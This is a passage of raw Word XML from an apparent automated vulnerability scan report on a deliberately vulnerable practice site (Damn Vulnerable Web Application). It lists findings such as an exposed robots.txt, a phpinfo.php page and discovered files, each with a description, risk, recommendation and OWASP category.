      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="10A53967" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C25E37" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="35A9B935" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D97DA98" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId161">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/robots.txt</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B3304BD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49A25E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found the robots.txt on the target server. This file instructs web crawlers what URLs and endpoints of the web application they can visit and crawl. Website administrators often misuse this file while attempting to hide some web pages from the users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6FCF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268268B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>There is no particular security risk in having a robots.txt file. However, it's important to note that adding endpoints in it should not be considered a security measure, as this file can be directly accessed and read by anyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F8130A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF4951" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to manually review the entries from robots.txt and remove the ones which lead to sensitive locations in the website (ex. administration panels, configuration files, etc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC6471" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A962FD8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId162">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.theregister.co.uk/2015/05/19/robotstxt/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EB667C8"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75F67931"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6B8363A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24052F5B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3FABAD86" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B94436A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51EB01AA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId163">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="69615E46" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="382CD48F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE3347D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId164">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="576A8C7A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C177D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44507A00" wp14:editId="5E652B2A">
            <wp:extent cx="5852160" cy="329184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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DD0DA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56822F1C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B561EEF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EDA7E5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EB356" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.23 Exposure of Sensitive Information </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="15E8BF76" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1742DE75" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5CFDC6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="39809BE0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A35C9F0" wp14:editId="2C90FAAB">
                  <wp:extent cx="1397000" cy="1397000"/>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0B66C4DF" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D05D89A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="04535168" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="009B5A6F"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6847C0F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2E9095F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2119726F"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66">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/phpinfo.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="542825D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3C3EB14" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E1E1C15" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="597855B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340D5F8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095D404C"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b/>
              </w:rPr>
              <w:t>Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2D547B7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87DFAFD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1412B91E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Email Address:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>license@php.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId167">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D10FCE4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="2FC271F3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A36D1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that this application does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected. Sensitive data targeted usually consists of emails, credit card and social security numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435CAF7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB833CE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that sensitive personal information within the application could be accessed by unauthorized parties. This could lead to privacy violations, identity theft, or other forms of personal or corporate harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA84A04" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C4FAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Compartmentalize the application to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F9599E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFDDF6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22FEDC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62980540" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.24 Interesting files found </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0CBF5DC2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0E6574" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5700FD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="20CDA854" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50ED3CF9" wp14:editId="384907E8">
                  <wp:extent cx="1397000" cy="1397000"/>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101F7566" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="247C9AA5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="5B456423" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21E78600"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258C562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A0C6D77" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D0424C"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68">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/login.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7D3D9BF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3D2936E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106E9458" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Login :: Damn Vulnerable Web A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="558F81A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F95C5E0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD4E62F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>1.36 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4C59021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D6E9333" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16120510" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Admin login page/section found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DB3016F"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53AE27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74AAC35" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76BD3F86"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69">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/php.ini</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="384772E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F0E4FD6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73199A75" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7DE4DDE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81050F4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14FE613B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>154 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="028246C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023214B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EC123AB"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php.ini may contain important php settings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AE19967"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44588A3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BC6FA36" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B79A26A"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70">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/README.md</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="626DF27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3BAFAF5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073A4B78" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="77BD6DE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EFC9295" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A902A8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>24.91 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7F20311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92E8C2A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C3FF26" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
